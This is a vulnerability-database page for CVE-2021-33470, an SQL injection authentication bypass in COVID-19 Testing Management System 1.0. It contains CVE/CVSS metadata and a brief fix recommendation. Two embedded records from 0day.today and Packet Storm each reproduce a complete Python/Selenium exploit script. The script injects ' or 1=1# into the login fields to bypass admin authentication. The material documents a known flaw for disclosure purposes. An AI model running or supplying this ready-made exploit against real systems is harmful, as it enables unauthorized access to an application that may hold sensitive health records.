Description
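Remote SQL injection exploit for COVID-19 Testing Management System version 1.0, based upon the original discovery by Rohit Burke in May of 2021. The related records below track the issue as CVE-2021-33470 (CWE-89, CVSS 3.1 base score 9.8): SQL injection in the admin panel login that lets an unauthenticated remote user bypass authentication. The durable fix is for the application to build its login query with prepared (parameterized) statements rather than concatenating the submitted username and password into the SQL text.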
Related
{"id": "1337DAY-ID-36374", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "COVID-19 Testing Management System 1.0 SQL Injection Exploit", "description": "COVID-19 Testing Management System version 1.0 remote SQL injection exploit based upon the original discovery by Rohit Burke in May of 2021.", "published": "2021-06-08T00:00:00", "modified": "2021-06-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36374", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2021-33470"], "immutableFields": [], "lastseen": "2021-12-03T01:57:58", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-33470"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163014"]}], "rev": 4}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-33470"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163014"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": 
"https://0day.today/exploit/36374", "sourceData": "# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection\n(Authentication Bypass)\n# Author: @nu11secur1ty\n# Testing and Debugging: @nu11secur1ty\n# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/\n# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/\n# CVE: CVE-2021-33470\n# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif\n\n[+] Exploit Source:\n\n#!/usr/bin/python3\n# Author: @nu11secur1ty\n# Debug: @nu11secur1ty\n# CVE: CVE-2021-33470\n\nfrom selenium import webdriver\nimport time\n\n\n#enter the link to the website you want to automate login.\nwebsite_link=\"\nhttp://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php\n\"\n\n#enter your login username SQL bling injection\nusername=\"nu11secur1ty' or 1=1#\"\n#enter your login password SQL bling injection\npassword=\"nu11secur1ty' or 1=1#\"\n\n# test and proof the SQL injection\n# user: admin\n# password: password\n\n#enter the element for username input field\nelement_for_username=\"username\"\n#enter the element for password input field\nelement_for_password=\"inputpwd\"\n\n#enter the element for submit button by class\nelement_for_submit=\"btn.btn-primary.btn-user.btn-block\"\n\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\nchromedriver]\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\n\nbrowser.get((website_link))\n\ntry:\nusername_element = browser.find_element_by_name(element_for_username)\nusername_element.send_keys(username)\npassword_element = browser.find_element_by_name(element_for_password)\npassword_element.send_keys(password)\ntime.sleep(3)\nsignInButton = browser.find_element_by_class_name(element_for_submit)\nsignInButton.click()\n\nprint(\"payload is deployed NOW, you 
have SQL Authentication Bypass =)...\\n\")\n\nexcept Exception:\n#### This exception occurs if the element are not found in the webpage.\nprint(\"Some error occured :(\")\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646005155}}
{"cve": [{"lastseen": "2022-04-25T17:26:33", "description": "COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T17:15:00", "type": "cve", "title": "CVE-2021-33470", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33470"], "modified": "2022-04-25T15:15:00", "cpe": ["cpe:/a:covid19_testing_management_system_project:covid19_testing_management_system:1.0"], "id": "CVE-2021-33470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33470", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:covid19_testing_management_system_project:covid19_testing_management_system:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-06-08T14:41:10", "description": "", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "packetstorm", "title": "COVID-19 Testing Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33470"], "modified": "2021-06-08T00:00:00", "id": "PACKETSTORM:163014", "href": 
"https://packetstormsecurity.com/files/163014/COVID-19-Testing-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection \n(Authentication Bypass) \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 06.08.2021 \n# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ \n# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ \n# CVE: CVE-2021-33470 \n# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug: @nu11secur1ty \n# CVE: CVE-2021-33470 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. \nwebsite_link=\" \nhttp://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php \n\" \n \n#enter your login username SQL bling injection \nusername=\"nu11secur1ty' or 1=1#\" \n#enter your login password SQL bling injection \npassword=\"nu11secur1ty' or 1=1#\" \n \n# test and proof the SQL injection \n# user: admin \n# password: password \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"inputpwd\" \n \n#enter the element for submit button by class \nelement_for_submit=\"btn.btn-primary.btn-user.btn-block\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) 
\ntime.sleep(3) \nsignInButton = browser.find_element_by_class_name(element_for_submit) \nsignInButton.click() \n \nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Some error occured :(\") \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163014/covid19tms10-sql.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}